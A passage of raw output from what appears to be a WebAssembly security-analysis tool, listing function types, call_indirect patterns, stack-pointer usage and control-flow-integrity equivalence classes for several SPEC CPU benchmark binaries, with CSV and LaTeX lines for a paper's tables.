129 | Functions with at least one call_indirect: 8 (4.94% of all functions)
130 | 
131 | Table elements initialization:
132 |          range: [    1,    1]   length:   1   unique funcs:    1   type: [i32, f64, i32, i32, i32, i32] -> [i32]
133 |          range: [    2,    2]   length:   1   unique funcs:    1   type: [i32, i32] -> []
134 |          range: [    3,    4]   length:   2   unique funcs:    2   type: [i32, i32, i32] -> [i32]
135 |          range: [    5,    5]   length:   1   unique funcs:    1   type: [i32] -> [i32]
136 |          range: [    6,    6]   length:   1   unique funcs:    1   type: [i32, i32, i32] -> [i32]
137 |          range: [    7,    8]   length:   2   unique funcs:    2   type: [i32, i64, i32] -> [i64]
138 |          range: [    9,    9]   length:   1   unique funcs:    1   type: [i32, i32, i32] -> [i32]
139 |          range: [   10,   10]   length:   1   unique funcs:    1   type: [i32] -> [i32]
140 |   8 table init ranges in total
141 | 
142 | Patterns (=preceding instructions) of call_indirect:
143 |      1 × unrestricted                         source:   i32.load   type [i32] -> [i32]
144 |          functions matching by type (regardless whether they are in the table):               26
145 |          functions matching by type and present in table (regardless at which table index):    2
146 |          functions matching by type and present in permissable table index range:              2
147 |      1 × unrestricted                         source: local.(get|tee)   type [i32, i32] -> []
148 |          functions matching by type (regardless whether they are in the table):               12
149 |          functions matching by type and present in table (regardless at which table index):    1
150 |          functions matching by type and present in permissable table index range:              1
151 |      6 × unrestricted                         source:   i32.load   type [i32, i32, i32] -> [i32]
152 |          functions matching by type (regardless whether they are in the table):               13
153 |          functions matching by type and present in table (regardless at which table index):    4
154 |          functions matching by type and present in permissable table index range:              4
155 |      1 × unrestricted                         source:   i32.load   type [i32, i64, i32] -> [i64]
156 |          functions matching by type (regardless whether they are in the table):                2
157 |          functions matching by type and present in table (regardless at which table index):    2
158 |          functions matching by type and present in permissable table index range:              2
159 |      1 × unrestricted                         source: local.(get|tee)   type [i32, f64, i32, i32, i32, i32] -> [i32]
160 |          functions matching by type (regardless whether they are in the table):                1
161 |          functions matching by type and present in table (regardless at which table index):    1
162 |          functions matching by type and present in permissable table index range:              1
163 |   5 call_indirect patterns in total
164 | 
165 | 
166 | call_indirect target equivalence classes (CFI equivalence classes):
167 |   type: [i32, f64, i32, i32, i32, i32] -> [i32], start idx: None, end idx: None, size (of class): 1, count (how often class appears: 1
168 |   type: [i32, i64, i32] -> [i64], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 1
169 |   type: [i32] -> [i32], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 1
170 |   type: [i32, i32, i32] -> [i32], start idx: None, end idx: None, size (of class): 4, count (how often class appears: 6
171 |   type: [i32, i32] -> [], start idx: None, end idx: None, size (of class): 1, count (how often class appears: 1
172 | 
173 | latex CFI table line for this program: 531.deepsjeng & C & 53.0\kern.5ptk\kern1pt & 10 & 1.1\% & 174 & 10 & 5.7\% & 8 & 4.6\% & 5 & 1 & 6 & 2.0 & 1 \\
174 | cfi_latex_csv_sum_avg_line:531.deepsjeng,52981,888,10,174,10,8,5,1,6,2,1
175 | benchmark,binary,class,size,count,source
176 | cfi_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",0,1,1,"local.(get|tee)"
177 | cfi_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,2,1,"i32.load"
178 | cfi_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",2,2,1,"i32.load"
179 | cfi_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",3,4,6,"i32.load"
180 | cfi_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",4,1,1,"local.(get|tee)"
181 | total classes: 5
182 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/spec-cpu/upstream/lbm_r.wasm.security-analysis.txt:
--------------------------------------------------------------------------------
  1 | filename: ./519.lbm_r/lbm_r.wasm
  2 |   benchmark: 519.lbm_r
  3 |   binary:    lbm_r.wasm
  4 | 
  5 | Functions:        80
  6 |   Imported:       13
  7 |   Non-imported:   67
  8 |   Exported:        5
  9 | 
 10 | Tables: 1 (should be 1 in Wasm v1)
 11 |   Table entries at init:         7
 12 |   Of those, unique functions:    7 (i.e., at least 8.75% of all functions can be called indirectly, because they are in the [indirect call] table)
 13 | 
 14 | Instructions:     13390
 15 |   call:             180 (1.34% of all instructions)
 16 |   call_indirect:     12 (0.09% of all, 6.25% of all calls)
 17 | 
 18 | Globals:
 19 |   #0 i32
 20 |      init: i32.const 5248032
 21 |      22 × global.get   43 × global.set   65 total (34/66% split)
 22 | 
 23 | Likely the stack pointer:       Global #0
 24 | Functions using stack pointer:   22 (32.84% of all non-imported functions)
 25 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 26 |     1  (1.49%) × [-560]
 27 |     1  (1.49%) × [-304]
 28 |     1  (1.49%) × [-256]
 29 |     1  (1.49%) × [-208]
 30 |     1  (1.49%) × [-128]
 31 |     1  (1.49%) × [-80]
 32 |     1  (1.49%) × [-64]
 33 |     2  (2.99%) × [-32]
 34 |     3  (4.48%) × [-48]
 35 |     9 (13.43%) × [-16]
 36 |    46 (68.66%) × []
 37 |   functions with stack allocation total: 21 (31.34%)
 38 | 
 39 | csv lines to extract for sp analysis and plots:
 40 | benchmark,binary,funccount,percent,sp_increments,increment_sum,increment_sum_abs
 41 | sp_csv_line:"519.lbm_r","lbm_r.wasm",1,1.4925373,"[-560]",-560,560
 42 | sp_csv_line:"519.lbm_r","lbm_r.wasm",1,1.4925373,"[-304]",-304,304
 43 | sp_csv_line:"519.lbm_r","lbm_r.wasm",1,1.4925373,"[-256]",-256,256
 44 | sp_csv_line:"519.lbm_r","lbm_r.wasm",1,1.4925373,"[-208]",-208,208
 45 | sp_csv_line:"519.lbm_r","lbm_r.wasm",1,1.4925373,"[-128]",-128,128
 46 | sp_csv_line:"519.lbm_r","lbm_r.wasm",1,1.4925373,"[-80]",-80,80
 47 | sp_csv_line:"519.lbm_r","lbm_r.wasm",1,1.4925373,"[-64]",-64,64
 48 | sp_csv_line:"519.lbm_r","lbm_r.wasm",2,2.9850745,"[-32]",-32,32
 49 | sp_csv_line:"519.lbm_r","lbm_r.wasm",3,4.477612,"[-48]",-48,48
 50 | sp_csv_line:"519.lbm_r","lbm_r.wasm",9,13.432836,"[-16]",-16,16
 51 | sp_csv_line:"519.lbm_r","lbm_r.wasm",46,68.656715,"[]",0,0
 52 | 
 53 | Counts of function types (17 unique types):
 54 |     1  (1.25%) × [i32, i32, i32, i32, i32] -> []
 55 |     1  (1.25%) × [i32, i32, i32, i32, i32] -> [i32]
 56 |     1  (1.25%) × [i32, i32, i32, i32, i32, i32] -> [i32]
 57 |     1  (1.25%) × [i32, f64, i32, i32, i32, i32] -> [i32]
 58 |     1  (1.25%) × [i64, i32, i32] -> [i32]
 59 |     1  (1.25%) × [f64, i32] -> [f64]
 60 |     2  (2.50%) × [] -> []
 61 |     2  (2.50%) × [] -> [i32]
 62 |     2  (2.50%) × [i32, i64, i32] -> [i64]
 63 |     2  (2.50%) × [i64, i32] -> [i32]
 64 |     4  (5.00%) × [i32, i32, i32, i32] -> [i32]
 65 |     5  (6.25%) × [i32, i32, i32] -> []
 66 |     5  (6.25%) × [i32, i32, i32] -> [i32]
 67 |     7  (8.75%) × [i32, i32] -> []
 68 |    13 (16.25%) × [i32, i32] -> [i32]
 69 |    14 (17.50%) × [i32] -> []
 70 |    18 (22.50%) × [i32] -> [i32]
 71 | 
 72 | Functions with at least one call_indirect: 10 (14.93% of all functions)
 73 | 
 74 | Table elements initialization:
 75 |          range: [    1,    1]   length:   1   unique funcs:    1   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 76 |          range: [    2,    2]   length:   1   unique funcs:    1   type: [i32] -> [i32]
 77 |          range: [    3,    3]   length:   1   unique funcs:    1   type: [i32, i32, i32] -> [i32]
 78 |          range: [    4,    5]   length:   2   unique funcs:    2   type: [i32, i64, i32] -> [i64]
 79 |          range: [    6,    6]   length:   1   unique funcs:    1   type: [i32, i32, i32] -> [i32]
 80 |          range: [    7,    7]   length:   1   unique funcs:    1   type: [i32] -> [i32]
 81 |   6 table init ranges in total
 82 | 
 83 | Patterns (=preceding instructions) of call_indirect:
 84 |      1 × unrestricted                         source:   i32.load   type [i32] -> [i32]
 85 |          functions matching by type (regardless whether they are in the table):               18
 86 |          functions matching by type and present in table (regardless at which table index):    2
 87 |          functions matching by type and present in permissable table index range:              2
 88 |      8 × unrestricted                         source:   i32.load   type [i32, i32, i32] -> [i32]
 89 |          functions matching by type (regardless whether they are in the table):                5
 90 |          functions matching by type and present in table (regardless at which table index):    2
 91 |          functions matching by type and present in permissable table index range:              2
 92 |      1 × unrestricted                         source:   i32.load   type [i32, i64, i32] -> [i64]
 93 |          functions matching by type (regardless whether they are in the table):                2
 94 |          functions matching by type and present in table (regardless at which table index):    2
 95 |          functions matching by type and present in permissable table index range:              2
 96 |      1 × unrestricted                         source: local.(get|tee)   type [i32, f64, i32, i32, i32, i32] -> [i32]
 97 |          functions matching by type (regardless whether they are in the table):                1
 98 |          functions matching by type and present in table (regardless at which table index):    1
 99 |          functions matching by type and present in permissable table index range:              1
100 |      1 × fixed index:      0                  source:  i32.const   type: [i32, i32] -> []
101 |          functions matching by type (regardless whether they are in the table):                7
102 |          functions matching by type and present in table (regardless at which table index):    0
103 |          functions matching by type and present in permissable table index range:              0
104 |   5 call_indirect patterns in total
105 | 
106 | 
107 | call_indirect target equivalence classes (CFI equivalence classes):
108 |   type: [i32, i64, i32] -> [i64], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 1
109 |   type: [i32, f64, i32, i32, i32, i32] -> [i32], start idx: None, end idx: None, size (of class): 1, count (how often class appears: 1
110 |   type: [i32] -> [i32], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 1
111 |   type: [i32, i32] -> [], start idx: Some(0), end idx: Some(0), size (of class): 0, count (how often class appears: 1
112 |   type: [i32, i32, i32] -> [i32], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 8
113 | 
114 | latex CFI table line for this program: 519.lbm & C & 13.4\kern.5ptk\kern1pt & 12 & 6.2\% & 80 & 7 & 8.8\% & 6 & 7.5\% & 5 & 1 & 8 & 2.4 & 1 \\
115 | cfi_latex_csv_sum_avg_line:519.lbm,13390,180,12,80,7,6,5,1,8,2.4,1
116 | benchmark,binary,class,size,count,source
117 | cfi_csv_line:"519.lbm_r","lbm_r.wasm",0,2,1,"i32.load"
118 | cfi_csv_line:"519.lbm_r","lbm_r.wasm",1,1,1,"local.(get|tee)"
119 | cfi_csv_line:"519.lbm_r","lbm_r.wasm",2,2,1,"i32.load"
120 | cfi_csv_line:"519.lbm_r","lbm_r.wasm",3,0,1,"i32.const"
121 | cfi_csv_line:"519.lbm_r","lbm_r.wasm",4,2,8,"i32.load"
122 | total classes: 5
123 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/spec-cpu/upstream/mcf_r.wasm.security-analysis.txt:
--------------------------------------------------------------------------------
  1 | filename: ./505.mcf_r/mcf_r.wasm
  2 |   benchmark: 505.mcf_r
  3 |   binary:    mcf_r.wasm
  4 | 
  5 | Functions:       136
  6 |   Imported:       12
  7 |   Non-imported:  124
  8 |   Exported:        5
  9 | 
 10 | Tables: 1 (should be 1 in Wasm v1)
 11 |   Table entries at init:        12
 12 |   Of those, unique functions:   12 (i.e., at least 8.82% of all functions can be called indirectly, because they are in the [indirect call] table)
 13 | 
 14 | Instructions:     27418
 15 |   call:             457 (1.67% of all instructions)
 16 |   call_indirect:     44 (0.16% of all, 8.78% of all calls)
 17 | 
 18 | Globals:
 19 |   #0 i32
 20 |      init: i32.const 5248800
 21 |      47 × global.get   92 × global.set  139 total (34/66% split)
 22 | 
 23 | Likely the stack pointer:       Global #0
 24 | Functions using stack pointer:   47 (37.90% of all non-imported functions)
 25 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 26 |     1  (0.81%) × [-16288]
 27 |     1  (0.81%) × [-8960]
 28 |     1  (0.81%) × [-560]
 29 |     1  (0.81%) × [-432]
 30 |     1  (0.81%) × [-304]
 31 |     1  (0.81%) × [-272]
 32 |     1  (0.81%) × [-256]
 33 |     1  (0.81%) × [-208]
 34 |     1  (0.81%) × [-192]
 35 |     1  (0.81%) × [-160]
 36 |     1  (0.81%) × [-144]
 37 |     1  (0.81%) × [-128]
 38 |     2  (1.61%) × [-112]
 39 |     2  (1.61%) × [-96]
 40 |     2  (1.61%) × [-80]
 41 |     2  (1.61%) × [-48]
 42 |     5  (4.03%) × [-32]
 43 |    20 (16.13%) × [-16]
 44 |    79 (63.71%) × []
 45 |   functions with stack allocation total: 45 (36.29%)
 46 | 
 47 | csv lines to extract for sp analysis and plots:
 48 | benchmark,binary,funccount,percent,sp_increments,increment_sum,increment_sum_abs
 49 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-16288]",-16288,16288
 50 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-8960]",-8960,8960
 51 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-560]",-560,560
 52 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-432]",-432,432
 53 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-304]",-304,304
 54 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-272]",-272,272
 55 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-256]",-256,256
 56 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-208]",-208,208
 57 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-192]",-192,192
 58 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-160]",-160,160
 59 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-144]",-144,144
 60 | sp_csv_line:"505.mcf_r","mcf_r.wasm",1,0.8064516,"[-128]",-128,128
 61 | sp_csv_line:"505.mcf_r","mcf_r.wasm",2,1.6129032,"[-112]",-112,112
 62 | sp_csv_line:"505.mcf_r","mcf_r.wasm",2,1.6129032,"[-96]",-96,96
 63 | sp_csv_line:"505.mcf_r","mcf_r.wasm",2,1.6129032,"[-80]",-80,80
 64 | sp_csv_line:"505.mcf_r","mcf_r.wasm",2,1.6129032,"[-48]",-48,48
 65 | sp_csv_line:"505.mcf_r","mcf_r.wasm",5,4.032258,"[-32]",-32,32
 66 | sp_csv_line:"505.mcf_r","mcf_r.wasm",20,16.129032,"[-16]",-16,16
 67 | sp_csv_line:"505.mcf_r","mcf_r.wasm",79,63.70968,"[]",0,0
 68 | 
 69 | Counts of function types (41 unique types):
 70 |     1  (0.74%) × [] -> [f64]
 71 |     1  (0.74%) × [i32] -> [f64]
 72 |     1  (0.74%) × [i32, i32] -> [i64]
 73 |     1  (0.74%) × [i32, i32, i32, i32, i32, i32] -> []
 74 |     1  (0.74%) × [i32, i32, i32, i32, i32, i32] -> [i32]
 75 |     1  (0.74%) × [i32, i32, i32, i32, i32, i64, i64] -> [i32]
 76 |     1  (0.74%) × [i32, i32, i32, i64, i64, i64, i64] -> []
 77 |     1  (0.74%) × [i32, i32, i64] -> []
 78 |     1  (0.74%) × [i32, i64] -> []
 79 |     1  (0.74%) × [i32, i64] -> [i64]
 80 |     1  (0.74%) × [i32, i64, i64] -> []
 81 |     1  (0.74%) × [i32, f32] -> []
 82 |     1  (0.74%) × [i32, f64] -> []
 83 |     1  (0.74%) × [i32, f64, i32, i32, i32, i32] -> [i32]
 84 |     1  (0.74%) × [i64] -> []
 85 |     1  (0.74%) × [i64] -> [i64]
 86 |     1  (0.74%) × [i64, i32, i32] -> [i32]
 87 |     1  (0.74%) × [i64, i64] -> [f32]
 88 |     1  (0.74%) × [i64, i64] -> [f64]
 89 |     1  (0.74%) × [i64, i64, i64, i64] -> [i32]
 90 |     1  (0.74%) × [i64, i64, i64, i64, i32, i32, i32, i32, i32, i32, i64, i64] -> []
 91 |     1  (0.74%) × [f64, i32] -> [f64]
 92 |     2  (1.47%) × [] -> [i32]
 93 |     2  (1.47%) × [i32] -> [i64]
 94 |     2  (1.47%) × [i32, i32, i32, i32] -> []
 95 |     2  (1.47%) × [i32, i32, i32, i32, i32] -> []
 96 |     2  (1.47%) × [i32, i32, i32, i32, i32] -> [i32]
 97 |     2  (1.47%) × [i32, i64, i32] -> [i64]
 98 |     2  (1.47%) × [i64, i32] -> [i32]
 99 |     2  (1.47%) × [i64, i64] -> [i32]
100 |     3  (2.21%) × [i32, i32, i32, i32] -> [i32]
101 |     3  (2.21%) × [i32, i64, i64, i32] -> []
102 |     4  (2.94%) × [] -> [i64]
103 |     6  (4.41%) × [i32, i64, i64, i64, i64] -> []
104 |     7  (5.15%) × [i32, i32, i32] -> []
105 |     8  (5.88%) × [i32] -> []
106 |    10  (7.35%) × [] -> []
107 |    10  (7.35%) × [i32, i32] -> []
108 |    13  (9.56%) × [i32, i32, i32] -> [i32]
109 |    16 (11.76%) × [i32, i32] -> [i32]
110 |    18 (13.24%) × [i32] -> [i32]
111 | 
112 | Functions with at least one call_indirect: 12 (9.68% of all functions)
113 | 
114 | Table elements initialization:
115 |          range: [    1,    1]   length:   1   unique funcs:    1   type: [i32, i64] -> [i64]
116 |          range: [    2,    3]   length:   2   unique funcs:    2   type: [i32, i32] -> [i32]
117 |          range: [    4,    4]   length:   1   unique funcs:    1   type: [i32] -> [i32]
118 |          range: [    5,    5]   length:   1   unique funcs:    1   type: [i32, i32, i32] -> [i32]
119 |          range: [    6,    6]   length:   1   unique funcs:    1   type: [i32, i64, i32] -> [i64]
120 |          range: [    7,    7]   length:   1   unique funcs:    1   type: [i32, f64, i32, i32, i32, i32] -> [i32]
121 |          range: [    8,    9]   length:   2   unique funcs:    2   type: [i32, i32, i32] -> [i32]
122 |          range: [   10,   10]   length:   1   unique funcs:    1   type: [i32] -> [i32]
123 |          range: [   11,   11]   length:   1   unique funcs:    1   type: [i32, i64, i32] -> [i64]
124 |          range: [   12,   12]   length:   1   unique funcs:    1   type: [i32, i32, i32] -> [i32]
125 |   10 table init ranges in total
126 | 
127 | Patterns (=preceding instructions) of call_indirect:
128 |      1 × unrestricted                         source:   i32.load   type [i32] -> [i32]
129 |          functions matching by type (regardless whether they are in the table):               18
130 |          functions matching by type and present in table (regardless at which table index):    2
131 |          functions matching by type and present in permissable table index range:              2
132 |     28 × unrestricted                         source: local.(get|tee)   type [i32, i32] -> [i32]
133 |          functions matching by type (regardless whether they are in the table):               16
134 |          functions matching by type and present in table (regardless at which table index):    2
135 |          functions matching by type and present in permissable table index range:              2
136 |      7 × unrestricted                         source:   i32.load   type [i32, i32, i32] -> [i32]
137 |          functions matching by type (regardless whether they are in the table):               13
138 |          functions matching by type and present in table (regardless at which table index):    4
139 |          functions matching by type and present in permissable table index range:              4
140 |      1 × unrestricted                         source:   i32.load   type [i32, i64, i32] -> [i64]
141 |          functions matching by type (regardless whether they are in the table):                2
142 |          functions matching by type and present in table (regardless at which table index):    2
143 |          functions matching by type and present in permissable table index range:              2
144 |      1 × unrestricted                         source: local.(get|tee)   type [i32, f64, i32, i32, i32, i32] -> [i32]
145 |          functions matching by type (regardless whether they are in the table):                1
146 |          functions matching by type and present in table (regardless at which table index):    1
147 |          functions matching by type and present in permissable table index range:              1
148 |      1 × fixed index:      0                  source:  i32.const   type: [i32, i32] -> []
149 |          functions matching by type (regardless whether they are in the table):               10
150 |          functions matching by type and present in table (regardless at which table index):    0
151 |          functions matching by type and present in permissable table index range:              0
152 |      5 × fixed index:      1                  source:  i32.const   type: [i32, i64] -> [i64]
153 |          functions matching by type (regardless whether they are in the table):                1
154 |          functions matching by type and present in table (regardless at which table index):    1
155 |          functions matching by type and present in permissable table index range:              1
156 |   7 call_indirect patterns in total
157 | 
158 | function #1 is indirectly called with a fixed table index
159 |   local.get 1
160 |   end
161 |   ...
162 | 
163 | call_indirect target equivalence classes (CFI equivalence classes):
164 |   type: [i32, i32] -> [], start idx: Some(0), end idx: Some(0), size (of class): 0, count (how often class appears: 1
165 |   type: [i32] -> [i32], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 1
166 |   type: [i32, i32, i32] -> [i32], start idx: None, end idx: None, size (of class): 4, count (how often class appears: 7
167 |   type: [i32, i64, i32] -> [i64], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 1
168 |   type: [i32, i64] -> [i64], start idx: Some(1), end idx: Some(1), size (of class): 1, count (how often class appears: 5
169 |   type: [i32, i32] -> [i32], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 28
170 |   type: [i32, f64, i32, i32, i32, i32] -> [i32], start idx: None, end idx: None, size (of class): 1, count (how often class appears: 1
171 | 
172 | latex CFI table line for this program: 505.mcf & C & 27.4\kern.5ptk\kern1pt & 44 & 8.8\% & 136 & 12 & 8.8\% & 8 & 5.9\% & 7 & 1 & 28 & 6.3 & 1 \\
173 | cfi_latex_csv_sum_avg_line:505.mcf,27418,457,44,136,12,8,7,1,28,6.285714285714286,1
174 | benchmark,binary,class,size,count,source
175 | cfi_csv_line:"505.mcf_r","mcf_r.wasm",0,0,1,"i32.const"
176 | cfi_csv_line:"505.mcf_r","mcf_r.wasm",1,2,1,"i32.load"
177 | cfi_csv_line:"505.mcf_r","mcf_r.wasm",2,4,7,"i32.load"
178 | cfi_csv_line:"505.mcf_r","mcf_r.wasm",3,2,1,"i32.load"
179 | cfi_csv_line:"505.mcf_r","mcf_r.wasm",4,1,5,"i32.const"
180 | cfi_csv_line:"505.mcf_r","mcf_r.wasm",5,2,28,"local.(get|tee)"
181 | cfi_csv_line:"505.mcf_r","mcf_r.wasm",6,1,1,"local.(get|tee)"
182 | total classes: 7
183 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/spec-cpu/upstream/nab_r.wasm.security-analysis.txt:
--------------------------------------------------------------------------------
  1 | filename: ./544.nab_r/nab_r.wasm
  2 |   benchmark: 544.nab_r
  3 |   binary:    nab_r.wasm
  4 | 
  5 | Functions:       201
  6 |   Imported:       12
  7 |   Non-imported:  189
  8 |   Exported:        5
  9 | 
 10 | Tables: 1 (should be 1 in Wasm v1)
 11 |   Table entries at init:        10
 12 |   Of those, unique functions:   10 (i.e., at least 4.98% of all functions can be called indirectly, because they are in the [indirect call] table)
 13 | 
 14 | Instructions:     55588
 15 |   call:             987 (1.78% of all instructions)
 16 |   call_indirect:     17 (0.03% of all, 1.69% of all calls)
 17 | 
 18 | Globals:
 19 |   #0 i32
 20 |      init: i32.const 5424864
 21 |       71 × global.get   135 × global.set   206 total (34/66% split)
 22 | 
 23 | Likely the stack pointer:       Global #0
 24 | Functions using stack pointer:   71 (37.57% of all non-imported functions)
 25 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 26 |     1  (0.53%) × [-8960]
 27 |     1  (0.53%) × [-1840]
 28 |     1  (0.53%) × [-1056]
 29 |     1  (0.53%) × [-512]
 30 |     1  (0.53%) × [-304]
 31 |     1  (0.53%) × [-256]
 32 |     1  (0.53%) × [-208]
 33 |     1  (0.53%) × [-192]
 34 |     1  (0.53%) × [-144]
 35 |     1  (0.53%) × [-128]
 36 |     1  (0.53%) × [-96]
 37 |     1  (0.53%) × [-64]
 38 |     2  (1.06%) × [-560]
 39 |     2  (1.06%) × [-432]
 40 |     2  (1.06%) × [-160]
 41 |     3  (1.59%) × [-112]
 42 |     4  (2.12%) × [-80]
 43 |     5  (2.65%) × [-48]
 44 |     7  (3.70%) × [-32]
 45 |    31 (16.40%) × [-16]
 46 |   121 (64.02%) × []
 47 |   functions with stack allocation total: 68 (35.98%)
 48 | 
 49 | csv lines to extract for sp analysis and plots:
 50 | benchmark,binary,funccount,percent,sp_increments,increment_sum,increment_sum_abs
 51 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-8960]",-8960,8960
 52 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-1840]",-1840,1840
 53 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-1056]",-1056,1056
 54 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-512]",-512,512
 55 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-304]",-304,304
 56 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-256]",-256,256
 57 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-208]",-208,208
 58 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-192]",-192,192
 59 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-144]",-144,144
 60 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-128]",-128,128
 61 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-96]",-96,96
 62 | sp_csv_line:"544.nab_r","nab_r.wasm",1,0.52910054,"[-64]",-64,64
 63 | sp_csv_line:"544.nab_r","nab_r.wasm",2,1.0582011,"[-560]",-560,560
 64 | sp_csv_line:"544.nab_r","nab_r.wasm",2,1.0582011,"[-432]",-432,432
 65 | sp_csv_line:"544.nab_r","nab_r.wasm",2,1.0582011,"[-160]",-160,160
 66 | sp_csv_line:"544.nab_r","nab_r.wasm",3,1.5873016,"[-112]",-112,112
 67 | sp_csv_line:"544.nab_r","nab_r.wasm",4,2.1164021,"[-80]",-80,80
 68 | sp_csv_line:"544.nab_r","nab_r.wasm",5,2.6455026,"[-48]",-48,48
 69 | sp_csv_line:"544.nab_r","nab_r.wasm",7,3.7037036,"[-32]",-32,32
 70 | sp_csv_line:"544.nab_r","nab_r.wasm",31,16.402117,"[-16]",-16,16
 71 | sp_csv_line:"544.nab_r","nab_r.wasm",121,64.021164,"[]",0,0
 72 | 
 73 | Counts of function types (47 unique types):
 74 |     1  (0.50%) × [] -> [f64]
 75 |     1  (0.50%) × [i32] -> [f64]
 76 |     1  (0.50%) × [i32, i32] -> [f64]
 77 |     1  (0.50%) × [i32, i32, i32, i32, i32] -> []
 78 |     1  (0.50%) × [i32, i32, i32, i32, i32, i32] -> []
 79 |     1  (0.50%) × [i32, i32, i32, i32, i32, i32, i32] -> []
 80 |     1  (0.50%) × [i32, i32, i32, i32, i32, i32, i32] -> [i32]
 81 |     1  (0.50%) × [i32, i32, i32, i32, i32, i32, i32, i32] -> [f64]
 82 |     1  (0.50%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [f64]
 83 |     1  (0.50%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [f64]
 84 |     1  (0.50%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32, i32, i32, i32, i32] -> []
 85 |     1  (0.50%) × [i32, i32, i32, i32, i32, i32, i32, i32, f64, f64] -> []
 86 |     1  (0.50%) × [i32, i32, i32, i32, i32, i32, i32, i32, f64, f64, i32, i32] -> []
 87 |     1  (0.50%) × [i32, i32, i64] -> []
 88 |     1  (0.50%) × [i32, i64] -> []
 89 |     1  (0.50%) × [i32, i64, i64] -> []
 90 |     1  (0.50%) × [i32, f32] -> []
 91 |     1  (0.50%) × [i32, f64] -> []
 92 |     1  (0.50%) × [i32, f64, i32, i32, i32, i32] -> [i32]
 93 |     1  (0.50%) × [i64, i32, i32] -> [i32]
 94 |     1  (0.50%) × [i64, i64] -> [f32]
 95 |     1  (0.50%) × [i64, i64] -> [f64]
 96 |     1  (0.50%) × [i64, i64, i64, i64] -> [i32]
 97 |     1  (0.50%) × [f64, i32] -> [i32]
 98 |     1  (0.50%) × [f64, f64] -> [f64]
 99 |     1  (0.50%) × [f64, f64, i32] -> [f64]
100 |     2  (1.00%) × [i32, i32] -> [i64]
101 |     2  (1.00%) × [i32, i32, i32] -> [f64]
102 |     2  (1.00%) × [i32, i64, i32] -> [i64]
103 |     2  (1.00%) × [i64, i32] -> [i32]
104 |     2  (1.00%) × [i64, i64] -> [i32]
105 |     2  (1.00%) × [f64, i32] -> [f64]
106 |     3  (1.49%) × [i32, i64, i64, i32] -> []
107 |     4  (1.99%) × [i32, i32, i32, i32] -> [i32]
108 |     5  (2.49%) × [i32, i32, i32, i32, i32, i32] -> [i32]
109 |     6  (2.99%) × [] -> []
110 |     6  (2.99%) × [i32, i32, i32, i32] -> []
111 |     6  (2.99%) × [i32, i32, i32, i32, i32] -> [i32]
112 |     6  (2.99%) × [i32, i64, i64, i64, i64] -> []
113 |     6  (2.99%) × [f64] -> [f64]
114 |     7  (3.48%) × [] -> [i32]
115 |    14  (6.97%) × [i32, i32, i32] -> [i32]
116 |    16  (7.96%) × [i32] -> []
117 |    16  (7.96%) × [i32, i32] -> []
118 |    16  (7.96%) × [i32, i32, i32] -> []
119 |    24 (11.94%) × [i32, i32] -> [i32]
120 |    28 (13.93%) × [i32] -> [i32]
121 | 
122 | Functions with at least one call_indirect: 10 (5.29% of all functions)
123 | 
124 | Table elements initialization:
125 |          range: [    1,    1]   length:   1   unique funcs:    1   type: [i32, i32, i32] -> [f64]
126 |          range: [    2,    2]   length:   1   unique funcs:    1   type: [i32] -> [i32]
127 |          range: [    3,    3]   length:   1   unique funcs:    1   type: [i32, i32, i32] -> [i32]
128 |          range: [    4,    4]   length:   1   unique funcs:    1   type: [i32, i64, i32] -> [i64]
129 |          range: [    5,    5]   length:   1   unique funcs:    1   type: [i32, f64, i32, i32, i32, i32] -> [i32]
130 |          range: [    6,    7]   length:   2   unique funcs:    2   type: [i32, i32, i32] -> [i32]
131 |          range: [    8,    8]   length:   1   unique funcs:    1   type: [i32] -> [i32]
